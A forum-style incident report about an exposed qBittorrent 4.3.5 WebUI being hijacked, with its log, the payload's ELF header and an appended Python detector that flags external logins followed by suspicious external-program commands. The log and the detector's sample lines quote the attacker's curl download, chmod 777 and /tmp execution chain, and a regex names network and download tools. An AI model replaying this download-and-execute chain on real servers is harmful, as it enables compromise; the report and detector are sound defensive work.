So I had my home server's qbittorrent (4.3.5) WebUI exposed externally through UPnP, because I'm careless, and it got exploited. I'm kind of lost as to why though; the logs only provide enough detail to show that they were able to log in directly without brute forcing a password, as there had been no failed logins. I did grep through all the logs.
Exploit went as follows:
1. Successful login from external IP... Somehow...
2. Remove all existing torrents (yay for backed up .torrent files)
3. Change "Run external program on torrent completion" to a curl command that downloaded a payload, then add a dummy torrent
4. Change external command to chmod 777 the payload, remove and re-add the torrent
5. Change external command to the payload itself, remove and re-add
Also they changed the WebUI password just to be a shit.
I'm not exceptionally dumb, and my qbittorrent was not running elevated. I also got lucky; even if it contained some privilege escalation exploit the payload was x86 and I'm running on ARM.
Still kind of concerning that there's some exploit to login without needing the password, since there are many users that access without an ssh tunnel, as that is the default config.
Worth noting maybe is that I have authentication bypassed for the 192.168.1.0/24 subnet, but the connection was from an external IP anyways.
I've redacted some stuff in the log, mainly so nobody goes and downloads the payload themselves. If you are skilled in reverse engineering binaries and want to dig into the payload, let me know. I'm going to try myself when I have some time anyways, but I'm kinda bad at it.
qbittorrent.log
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/21903
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: UDP/21903
(I) 2021-11-13T07:15:04 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/8080
(N) 2021-11-13T07:37:04 - WebAPI login success. IP: ::ffff:(redacted external ip)
(N) 2021-11-13T07:37:05 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:05 - '(redacted torrent)' was removed from the transfer list.
...
(every torrent gets removed)
...
(N) 2021-11-13T07:37:06 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:22 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: curl http://(redacted ip):8000/i386 --output /tmp/t
(N) 2021-11-13T07:37:27 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:27 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:28 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:29 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: chmod 777 /tmp/t
(N) 2021-11-13T07:37:49 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:49 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:50 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:52 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: /tmp/t
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x80a7020
Start of program headers: 52 (bytes into file)
Start of section headers: 276 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 7
Size of section headers: 40 (bytes)
Number of section headers: 14
Section header string table index: 3
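The chain in the log above (WebAPI login from a non-LAN address, then "running external program" commands that fetch, chmod and execute something from /tmp) is easy to pick out of qbittorrent.log automatically. The following is an added detection example written for this thread, not code from the post or from the qBittorrent project; the sample log lines are constructed to mirror the excerpt, the 203.0.113.x addresses are placeholders, and the trusted LAN ranges and "suspicious command" heuristics are my own choices.

```python
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed sample lines modelled on the post's qbittorrent.log; 203.0.113.x are placeholder IPs.
SAMPLE_LOG = """\
(N) 2021-11-13T07:37:04 - WebAPI login success. IP: ::ffff:203.0.113.7
(N) 2021-11-13T07:37:22 - Torrent: dummy, running external program, command: curl http://203.0.113.9:8000/i386 --output /tmp/t
(N) 2021-11-13T07:37:29 - Torrent: dummy, running external program, command: chmod 777 /tmp/t
(N) 2021-11-13T07:37:52 - Torrent: dummy, running external program, command: /tmp/t
(N) 2021-11-13T09:00:00 - WebAPI login success. IP: ::ffff:192.168.1.20
(N) 2021-11-13T09:00:10 - Torrent: movie, running external program, command: /usr/local/bin/notify.sh "%N"
"""
LOGIN_RE = re.compile(r"^\(\w\) (\S+) - WebAPI login success\. IP: (?:::ffff:)?(\S+)$")
EXEC_RE = re.compile(r"^\(\w\) (\S+) - Torrent: .*, running external program, command: (.+)$")
# Heuristic (my own choice): downloaders, permission changes, or anything run out of a temp dir.
SUSPICIOUS = re.compile(r"\b(curl|wget|chmod|base64|nc|ncat)\b|(^|\s)/(tmp|var/tmp|dev/shm)/")
# LAN ranges treated as trusted (the post bypasses auth for 192.168.1.0/24); anything else is external.
LOCAL_NETS = [ip_network(n) for n in ("192.168.0.0/16", "10.0.0.0/8", "172.16.0.0/12", "127.0.0.0/8")]

def is_external(ip: str) -> bool:
    try:
        addr = ip_address(ip)
    except ValueError:
        return True  # unparsable address: treat as untrusted
    return not any(addr in net for net in LOCAL_NETS)

def scan(log_text: str) -> list:
    """Return (timestamp, kind, detail) for external logins and suspicious external-program runs."""
    findings = []
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m and is_external(m.group(2)):
            findings.append((m.group(1), "external-login", m.group(2)))
            continue
        m = EXEC_RE.match(line)
        if m and SUSPICIOUS.search(m.group(2)):
            findings.append((m.group(1), "suspicious-exec", m.group(2)))
    return findings

def chains(findings: list, window_s: int = 3600) -> list:
    """Pair each suspicious exec with the external login that preceded it within window_s seconds."""
    out, last_login = [], None
    for ts, kind, detail in findings:
        when = datetime.fromisoformat(ts)
        if kind == "external-login":
            last_login = (when, detail)
        elif last_login and (when - last_login[0]).total_seconds() <= window_s:
            out.append((last_login[1], detail))
    return out
```

Run `chains(scan(open("qbittorrent.log").read()))` against a real log to list every suspicious command that followed a non-LAN login; a benign post-completion script from a LAN login, like the last two sample lines, produces nothing.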